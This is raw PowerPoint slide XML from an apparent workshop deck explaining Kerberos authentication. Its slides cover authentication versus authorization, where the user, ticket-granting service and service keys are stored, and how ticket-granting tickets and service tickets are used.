            <a:off x="4788616" y="5579710"/>
            <a:ext cx="2736766" cy="28800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3" name="TextBox 12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5000628" y="5087018"/>
            <a:ext cx="2286016" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" b="1" i="1" dirty="0" err="1">
                <a:ln w="3175">
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="10000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Authorization</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="800" b="1" i="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2">
                  <a:lumMod val="10000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Segoe"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Rectangle 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1799339" y="5085184"/>
            <a:ext cx="1980030" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" b="1" i="1" dirty="0">
                <a:ln w="3175">
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="10000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Authentication</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="700" b="1" i="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2">
                  <a:lumMod val="10000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="U-Turn Arrow 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="4907675" y="5729256"/>
            <a:ext cx="546712" cy="794972"/>
          </a:xfrm>
          <a:prstGeom prst="uturnArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 25000"/>
              <a:gd name="adj2" fmla="val 25000"/>
              <a:gd name="adj3" fmla="val 25000"/>
              <a:gd name="adj4" fmla="val 43750"/>
              <a:gd name="adj5" fmla="val 928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endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="16" name="Picture 15" descr="D:\Aeshen\TechNet 2006\12-December\Msft-longhorn-papers\TDM Deck\Windows Illustration Icons\Internet.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3894489" y="5971468"/>
            <a:ext cx="571505" cy="571504"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="17" name="Picture 16" descr="server.emf"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7503260" y="5185650"/>
            <a:ext cx="717771" cy="1071570"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="18" name="Picture 22" descr="Blue Embossed Cylinder"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7816206" y="5838300"/>
            <a:ext cx="549382" cy="721821"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="56770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childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="15" fill="hold">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1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="12"/>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up)">
                                      <p:cBhvr>
                                        <p:cTn id="21" dur="10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wipe(left)">
                                      <p:cBhvr>
                                        <p:cTn id="33" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3">
                                            <p:txEl>
                                              <p:pRg st="0" end="0"/>
                                            </p:txEl>
                                          </p:spTgt>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Effect transition="in" filter="wipe(left)">
                                      <p:cBhvr>
                                        <p:cTn id="37" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3">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wipe(left)">
                                      <p:cBhvr>
                                        <p:cTn id="42" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3">
                                            <p:txEl>
                                              <p:pRg st="4" end="4"/>
                                            </p:txEl>
                                          </p:spTgt>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Effect transition="in" filter="wipe(left)">
                                      <p:cBhvr>
                                        <p:cTn id="46" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3">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Effect transition="in" filter="wipe(left)">
                                      <p:cBhvr>
                                        <p:cTn id="51" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3">
                                            <p:txEl>
                                              <p:pRg st="2" end="2"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="52" presetID="22" presetClass="entr" presetSubtype="8" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="53" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="3">
                                            <p:txEl>
                                              <p:pRg st="3" end="3"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(left)">
                                      <p:cBhvr>
                                        <p:cTn id="54" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3">
                                            <p:txEl>
                                              <p:pRg st="3" end="3"/>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wipe(left)">
                                      <p:cBhvr>
                                        <p:cTn id="59" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3">
                                            <p:txEl>
                                              <p:pRg st="6" end="6"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="60" presetID="22" presetClass="entr" presetSubtype="8" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="61" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="3">
                                            <p:txEl>
                                              <p:pRg st="7" end="7"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(left)">
                                      <p:cBhvr>
                                        <p:cTn id="6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12" grpId="0" animBg="1"/>
      <p:bldP spid="13" grpId="0"/>
      <p:bldP spid="14" grpId="0"/>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dirty="0"/>
              <a:t>Physical Structure</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Subtitle 1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7958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6"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Keys</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="15"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="395536" y="1212428"/>
            <a:ext cx="7924800" cy="1677382"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In order to provide secure authentication, Kerberos uses symmetric keys, encrypted objects and Kerberos services.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Later in this workshop we will cover:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Why are keys needed?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What keys are used in Kerberos authentication?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Kerberos Physical Structure</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="14" name="Group 13"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="212780" y="2887853"/>
            <a:ext cx="3150378" cy="3304015"/>
            <a:chOff x="212780" y="2887853"/>
            <a:chExt cx="3150378" cy="3304015"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="17" name="Group 16"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="389436" y="3058532"/>
              <a:ext cx="2973722" cy="3133336"/>
              <a:chOff x="5436096" y="1988840"/>
              <a:chExt cx="2973722" cy="3133336"/>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6096" y="1988840"/>
                <a:ext cx="2973722" cy="3133336"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="19" name="TextBox 18"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="6451706" y="2094184"/>
                <a:ext cx="942502" cy="215444"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" sz="1400" dirty="0"/>
                  <a:t>Workstation</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="20" name="TextBox 19"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="6109433" y="2358386"/>
                <a:ext cx="1627048" cy="184666"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" sz="1200" dirty="0"/>
                  <a:t>User Credentials Cache</a:t>
                </a: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3892" y="2704501"/>
                <a:ext cx="327713" cy="327713"/>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94254" y="3128299"/>
                <a:ext cx="472016" cy="312696"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="23" name="TextBox 22"/>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="6293813" y="2764784"/>
                <a:ext cx="1806580" cy="2062103"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr>
                  <a:spcAft>
                    <a:spcPts val="1500"/>
                  </a:spcAft>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-US" sz="1400" dirty="0"/>
                  <a:t>User Key</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr>
                  <a:spcAft>
                    <a:spcPts val="1500"/>
                  </a:spcAft>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-US" sz="1400" dirty="0"/>
                  <a:t>Ticket-Granting Ticket</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr>
                  <a:spcAft>
                    <a:spcPts val="1500"/>
                  </a:spcAft>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-US" sz="1400" dirty="0"/>
                  <a:t>Ticket-Granting Service Session Key</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr>
                  <a:spcAft>
                    <a:spcPts val="1500"/>
                  </a:spcAft>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-US" sz="1400" dirty="0"/>
                  <a:t>Service Ticket</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr>
                  <a:spcAft>
                    <a:spcPts val="1500"/>
                  </a:spcAft>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-US" sz="1400" dirty="0"/>
                  <a:t>Session Key</a:t>
                </a:r>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14636" y="3617204"/>
                <a:ext cx="306975" cy="306975"/>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00321" y="4129403"/>
                <a:ext cx="465949" cy="308676"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>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00321" y="4541553"/>
                <a:ext cx="329267" cy="329267"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </p:gr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2780" y="2887853"/>
              <a:ext cx="654523" cy="607612"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="29" name="Group 28"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3344564" y="2887853"/>
            <a:ext cx="3209859" cy="2797046"/>
            <a:chOff x="255572" y="2886676"/>
            <a:chExt cx="3209859" cy="2797046"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="30" name="Picture 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9436" y="3068959"/>
              <a:ext cx="2973722" cy="2593105"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="31" name="TextBox 30"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1154945" y="3169000"/>
              <a:ext cx="1442703" cy="215444"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0"/>
                <a:t>Domain Controller</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="32" name="TextBox 31"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1073648" y="3427996"/>
              <a:ext cx="1612173" cy="184666"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="1200" dirty="0"/>
                <a:t>KDC Account Database</a:t>
              </a:r>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232" y="3774193"/>
              <a:ext cx="327713" cy="327713"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="34" name="TextBox 33"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1247153" y="3834476"/>
              <a:ext cx="1806580" cy="1246495"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr>
                <a:spcAft>
                  <a:spcPts val="1500"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0"/>
                <a:t>User Key</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:spcAft>
                  <a:spcPts val="1500"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0"/>
                <a:t>Ticket-Granting Service Key</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:spcAft>
                  <a:spcPts val="1500"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0"/>
                <a:t>Service Key</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>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5572" y="2886676"/>
              <a:ext cx="628030" cy="741586"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="36" name="Picture 3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703556" y="4921847"/>
              <a:ext cx="761875" cy="761875"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="37" name="Picture 3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62028" y="4283317"/>
              <a:ext cx="351842" cy="351842"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="38" name="Picture 3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7037" y="4807015"/>
              <a:ext cx="325088" cy="325088"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="28" name="Group 27"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6544357" y="2887853"/>
            <a:ext cx="2368213" cy="2108584"/>
            <a:chOff x="5644949" y="3300047"/>
            <a:chExt cx="2368213" cy="2108584"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="42" name="Picture 4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748581" y="3475336"/>
              <a:ext cx="2264581" cy="1933295"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="43" name="Picture 4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18850" y="4176785"/>
              <a:ext cx="325088" cy="325088"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="44" name="TextBox 43"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5892597" y="3568744"/>
              <a:ext cx="2090918" cy="215444"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0"/>
                <a:t>Server</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="46" name="TextBox 45"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6596146" y="4234220"/>
              <a:ext cx="1160228" cy="623248"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr>
                <a:spcAft>
                  <a:spcPts val="1500"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0"/>
                <a:t>Service Key</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:spcAft>
                  <a:spcPts val="1500"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0"/>
                <a:t>Session Key</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="47" name="Picture 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51392" y="4597016"/>
              <a:ext cx="329267" cy="329267"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="48" name="Picture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644949" y="3300047"/>
              <a:ext cx="495296" cy="680176"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="45" name="TextBox 44"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5820589" y="3827740"/>
              <a:ext cx="2145942" cy="184666"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="1200" dirty="0"/>
                <a:t>Service Credentials Cache</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="88884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de-DE" dirty="0"/>
              <a:t>Tickets</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="15"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="395536" y="1212428"/>
            <a:ext cx="7924800" cy="3631763"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Is a main component of Kerberos authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>There are two kinds of tickets</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Ticket-Granting Tickets</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A user's initial ticket from the authentication service</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Used to request service tickets</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Meant only for use by the ticket-granting service</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Service tickets</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A service ticket is used to authenticate with services other than the TGS and is meant only for the target service</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The KDC does not keep track of tickets</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can be reused</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Service tickets have an expiration time</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
